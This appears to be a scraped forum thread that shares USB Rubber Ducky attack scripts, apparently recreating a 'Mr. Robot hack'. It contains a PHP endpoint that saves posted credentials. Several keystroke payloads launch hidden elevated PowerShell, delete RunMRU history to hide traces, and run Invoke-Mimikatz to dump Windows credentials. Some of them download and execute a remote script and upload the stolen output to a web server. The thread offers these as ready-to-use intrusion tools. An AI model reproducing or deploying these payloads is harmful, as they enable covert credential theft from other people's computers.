0x41414141

Here you go. <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?>

Sure, I recommend you install Git to download all the relevant Rubber Ducky code. Once you've installed Git, simply run the following command to clone everything: git clone https://github.com/hak5darren/USB-Rubber-Ducky.git From there, follow the instructions posted @ https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky The Twin Duck firmware is located in USB-Rubber-Ducky/Firmware/Images/ -- there are several versions but try c_duck_v2.1.hex Yes, the last script also cleans up the evidence. If you use the script, make sure you download Invoke-Mimikatz.ps1 and copy/rename it on your Twin Duck as im.ps1, you'll also need to modify the drive volume label to read DUCK

Here's a version for the Twin Duck. Make sure you leave the ducky plugged in long enough for the creds file to be written in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d ENTER DELAY 500 STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';" ENTER

In that case you'll need to flash your firmware to a composite edition (i.e. c_duck_v2.1.hex) to function as a Twin Duck (both a USB drive and HID device). Here is a hybrid script that will work on your current default firmware. It will download the powershell script from a remote web server and save the mimikatz output to the local machine in the %temp% folder. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://paste.ee/r/Xopop');Invoke-Mimikatz -DumpCreds|Out-File '%temp%\mimikatz.txt';"&exit ENTER I'll follow up with another version for the Twin Duck firmware.

Do you already have a working version of c_duck_v2.1.hex?

I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads. Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit ENTER